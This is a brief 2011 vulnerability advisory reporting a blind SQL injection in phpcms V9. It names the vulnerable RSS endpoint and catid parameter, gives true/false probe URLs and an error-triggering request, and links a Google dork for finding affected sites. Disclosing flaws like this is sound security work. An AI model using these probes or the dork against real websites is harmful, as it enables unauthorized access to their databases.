phpcms V9 BLind SQL Injection Vulnerability

2011-01-24T00:00:00
ID SECURITYVULNS:DOC:25526
Type securityvulns
Reporter Securityvulns
Modified 2011-01-24T00:00:00

Description

================================================================= phpcms V9 BLind SQL Injection Vulnerability =================================================================

Software: phpcms V9 Vendor: www.phpcms.cn Vuln Type: BLind SQL Injection Download link: http://www.phpcms.cn/2010/1229/326.html Author: eidelweiss contact: eidelweiss[at]windowslive[dot]com Home: www.eidelweiss.info

Google Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^

References: http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html

=================================================================

    exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

    Example p0c

[!] http://host/index.php?m=content&c=rss&catid=10 <= True [!] http://host/index.php?m=content&c=rss&catid=-10 <= False

[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

=================================================================

    Nothing Impossible In This World Even Nobody&#96;s Perfect

=================================================================

=========================| -=[ E0F ]=- |=========================